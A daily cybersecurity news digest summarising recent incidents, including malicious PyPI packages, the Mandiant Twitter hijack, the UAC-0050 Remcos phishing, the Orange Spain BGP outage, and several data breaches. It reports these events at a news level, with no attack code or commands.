Daily Brief

Three malicious Python packages were discovered in PyPI targeting Linux systems to deploy cryptocurrency miners. The packages, named modularseven, driftme, and catme, were downloaded 431 times before removal. Malicious code within the packages retrieved cryptocurrency mining scripts from remote servers. The malware operation resembled a previous campaign using a package called culturestreak, using similar domains and hosting strategies. Newer packages included an extra stage in the payload delivery process to avoid detection by security tools. Malicious commands were added to the ~/.bashrc file for persistence, ensuring the malware's continued operation on rebooted devices. The sophisticated evasion techniques highlight the importance of enhanced security measures for open-source repositories.

Four Chinese balloons were observed over the Taiwan Strait, with three crossing over Taiwan and near the island's Ching-Chuan-Kang air base. One balloon, previously shot down in US airspace, reportedly used a US internet provider for navigation and sent data back to China. US after the incident blacklisted six entities linked to China's military and the PLA's aerospace programs. Beijing denied intentional airspace intrusion, yet the Pentagon identified the balloon as having intelligence gathering capabilities. Taiwanese Ministry of Defense monitored accompanying PLA aircraft and PLAN vessels, with ongoing updates due to frequent appearances. The sighting of balloons over Taiwan's landmass is rare, often described as weather monitoring devices, but their purpose this time remains unconfirmed. Tensions rise as the balloon sightings precede Taiwan's presidential and parliamentary elections, amidst increasing CCP rhetoric about "reunification."

The npm package registry experienced a flood of over 3,000 packages during the holidays, creating significant implications for npm authors. A package named "everything" was introduced, scripted to download the entire npm package registry, quickly exhausting a computer's storage. As a consequence of npm’s dependency policy, the existence of "everything" prevented npm authors from removing their packages since they became dependencies for "everything." The package "everything" and its sub-packages created a cumbersome dependency chain that initiated the download of millions of transitive npm packages. The creator of "everything," PatrickJS, apologized for the unintended disruptions his package caused and has reached out to npm admins for a resolution. The npm policy preventing package removal if it's a dependency for others came in response to the "left-pad" incident in 2016 to ensure stability in the programming ecosystem. Even the author of "everything" faces difficulty in removing his packages due to the complex dependency web they created, which ironically is a result of the npm policy designed to prevent such disruptions. Actions were taken to mitigate the situation, with the "@everything-registry" scoped packages linked to "everything" being set to private, presumably to stop the cascade of downloads.

UAC-0050, identified as a threat actor since 2020, is using sophisticated phishing attacks to distribute the Remcos Remote Access Trojan (RAT). Recent attacks involve a new tactic that uses pipe methods for interprocess communication to avoid detection by antivirus and Endpoint Detection and Response (EDR) systems. The group targets Ukrainian and Polish entities using social engineering, often impersonating legitimate organizations to encourage opening malicious attachments. A phishing emails purported to offer consultancy roles with the Israel Defense Forces (IDF) was part of the campaign, primarily targeting Ukrainian military personnel. CERT-UA attributed a phishing campaign to UAC-0050 in Feb 2023, meant for delivering Remcos RAT and occasionally an information stealer named Meduza Stealer. Analysis of a specific LNK file revealed a complex infection process involving staged script execution and downloading additional payloads for persistence and data harvesting. The Remcos RAT has capabilities to extract system data and credentials from various web browsers, further compromising the security of infected systems.

American cybersecurity firm Mandiant's Twitter account was hijacked to promote a cryptocurrency scam. The incident, where the account was renamed and used to impersonate the Phantom crypto wallet service, lasted over six hours. The scam included a fake airdrop promotion that encouraged users to visit a malicious link. It's unclear how the breach occurred, but possibilities include MFA bypass or compromise of Twitter Support staff. Mandiant, a prominent threat intelligence organization, is a subsidiary of Google Cloud following a $5.4 billion acquisition. Mandiant regained control of their Twitter account; the current security status after the incident has not been detailed. The hacker's identity remains unknown, and further details are expected when Mandiant issues a statement.

Microsoft has disabled the ms-appinstaller URI protocol after detecting its misuse for malware installation. The issue echoes a vulnerability from December 2021, which allowed attackers to bypass security measures using App Installer spoofing. The protocol, reintroduced in August 2022, let users install apps from the web directly, without local storage requirements, but has been exploited by threat actors. Microsoft is working with certificate authorities to revoke certificates used by identified malware samples. Enterprises with the EnableMSAppInstallerProtocol group policy set to "Enabled" or not configured, using App Installer versions v1.18.2691 to v1.21.3421, and Windows updates from October 2022 to March 2023 are at risk and need updates. This change adds a layer of friction for web-based application installations, requiring additional steps for safe downloading and installation.

Mandiant's Twitter account was taken over by an attacker to spread a cryptocurrency scam. The hijacker renamed the account to mimic the Phantom crypto wallet and offered fake $PHNTM token airdrop. Clicking the scam 'Claim Airdrop' button redirects users to install a genuine wallet, which is then exploited to drain funds. Phantom Wallet has recognized the scam and blocked interaction with the malicious website to safeguard users. After the scam, the hijacker posted mocking messages to Mandiant and deleted the scam tweet. The scam included retweets from the official Phantom account to seem legitimate. Mandiant's original Twitter handle @mandiant is no longer available, displaying an error message that the account does not exist.

Mandiant's Twitter account was hijacked to disseminate a cryptocurrency scam, falsely representing the Phantom crypto wallet. An unauthorized actor took over Mandiant's account, changed its name to @phantomsolw, and advertised a fake airdrop of $PHNTM tokens. Users clicking on the 'Claim Airdrop' button were directed to a phishing site designed to drain cryptocurrency from their wallets. The legitimate Phantom wallet service has recognized the threat and disabled interactions with the scam website to protect users. Although the scam tweet has been deleted, the attacker continued to mock Mandiant with messages suggesting they change their password and check bookmarks. The hacker is retweeting official posts from Phantom, possibly to gain credibility for potential future scams. Mandiant's Twitter handle @mandiant is currently inaccessible, displaying a "This account doesn't exist" error message.

Estes Express Lines, a major American freight shipper, experienced a ransomware attack that potentially compromised the personal information of over 21,000 customers. The attack was first disclosed in early October, with the company eventually admitting the presence of ransomware after initially noting an IT infrastructure impact. The ransomware gang Lockbit claimed responsibility for the cyberattack and allegedly published the stolen data on November 13. Estes Express Lines decided not to pay the ransom, in line with FBI and financial regulator recommendations, despite potential risks of data exposure. Forensic investigations confirmed that personal information, including names and Social Security numbers, was stolen in the breach. The company has not disclosed specifics of the stolen data, the ransom amount requested, or detailed reasons for not paying the ransom. Estes is offering 12 months of free identity monitoring services through Kroll to the affected individuals and has not observed any cases of identity theft or financial loss from the incident.

Orange Spain's RIPE account was compromised, resulting in misconfigured BGP routing and RPKI. The breach allowed the attacker to reroute internet traffic and caused an outage in Orange Spain's services. Cloudflare explains BGP relies on trust, but RPKI standards help prevent hijacking by verifying correct AS number origins. The hacker used a false AS number to create invalid RPKI records for Orange Spain's IP addresses, disrupting service. The outage, lasting roughly one and a half hours, was confirmed by Orange Spain, stating no customer data was compromised. The company's lack of two-factor authentication on their RIPE account may have facilitated the breach. Orange Spain is working on restoring their services, though it's unclear how exactly the hacker gained access to the account.

A Nigerian hacker, Olusegun Samson Adejorin, was arrested in Ghana for defrauding U.S.-based charitable organizations of over $7.5 million through business email compromise (BEC) attacks. The fraud took place between June and August 2020, with Adejorin unlawfully accessing email accounts and impersonating charity organization employees to request fund transfers. Adejorin misled one charity into transferring millions to bank accounts under his control by posing as another charity that received investment services from them, using stolen credentials. He faces up to 20 years in prison for wire fraud, in addition to five years for unauthorized computer access and a mandatory two-year sentence for aggravated identity theft, potentially extended by seven years for domain name abuse. The U.S. Department of Justice highlighted the extent of damage BEC attacks can cause, citing an FBI report detailing billions in losses. Defense strategies against BEC attacks include multi-factor authentication, email filtering, and establishing verification procedures for wire transfers, such as confirming changes in banking details through a secondary communication channel.

Adult media conglomerate Aylo has restricted access to its websites, including PornHub, in Montana and North Carolina due to new age verification laws effective January 1st. The laws stipulate that adult content providers use "reasonable age verification methods," with non-compliance opening them to lawsuits from individuals. Besides PornHub, Aylo's blockade affects its other properties such as RedTube and Brazzers, which now show a video statement explaining the decision upon access attempts from the restricted states. Aylo argues that the legislation, while well-meaning, could lead to fewer safeguards and compromises user privacy by requiring frequent ID checks. The measures have reportedly led to a surge in VPN usage, although providers may need to block VPNs or assume all VPN traffic originates from the regulated states to comply fully. Concerns have been raised over the potential switch to less secure VPNs in response to the crackdown, which may expose users to malware and security risks.

LastPass mandates a 12-character minimum for master passwords to enhance security for all users, replacing the previously allowed shorter passwords. This enforcement follows historic default settings from 2018 and coincides with measures to counteract compromised credentials. New or reset passwords are compared against a database of credentials known to be exposed on the dark web, and users are alerted if matches are found. Users experienced significant disruptions due to a forced multi-factor authentication (MFA) re-enrollment process initiated in May 2023. The security enhancements stem from breaches in August and November 2022, where attackers accessed LastPass' development environment and customer vault data. As a consequence of the breaches, hackers exploited stolen data to steal $4.4 million in cryptocurrency by cracking LastPass master passwords. LastPass will start informing B2C customers about these changes immediately and B2B customers starting January 10th, ensuring all accounts employ the updated security protocols.

HealthEC LLC experienced a data breach impacting an estimated 4.5 million individuals who received care from the company's clients. Unauthorized access to HealthEC's systems occurred between July 14 and July 23, 2023, resulting in theft of files containing sensitive patient data. The breach was reported on December 22, 2023, following an investigation that concluded on October 24. Patient data types compromised include personal and health information, necessitating vigilance against identity theft and fraud. Patients are advised to monitor account statements, benefit explanations, and credit reports for unusual activities. A recent report to Maine's Attorney General disclosed that 112,005 individuals were affected from just one client, MD Valuecare, highlighting a fraction of the total breach. The U.S. Department of Health and Human Services' breach portal updated to reflect the larger scale of the breach, with 4,452,782 total affected individuals across 17 healthcare providers and systems including notable entities such as Corewell Health and the State of Tennessee – Division of TennCare.

French IT firm Atos is in talks with Airbus to sell its Big Data & Security division, seeking to alleviate its financial strain. The potential deal, valued at €1.5-1.8 billion, fits Airbus's aim to expand its cybersecurity capabilities as a European aerospace and defense leader. Atos is considering a "major asset disposal program" to address its maturing debts totaling €4.8 billion between 2024 and 2029. Atos' financial strategies include new bank financing, accessing capital markets, and improving working capital to manage its substantial debt. Previous attempts to sell parts of Atos, including a joint bid of €4.2 billion for BDS rejected by the board, reflect the ongoing restructuring challenges. The company's leadership has seen significant turnover, with three CEOs in the past three years and a shuffle in the board of directors to strengthen finance and transformation expertise. The sales effort comes amidst political concerns in France over national security, with calls for possible nationalization to protect sensitive projects managed by Atos' cybersecurity wing.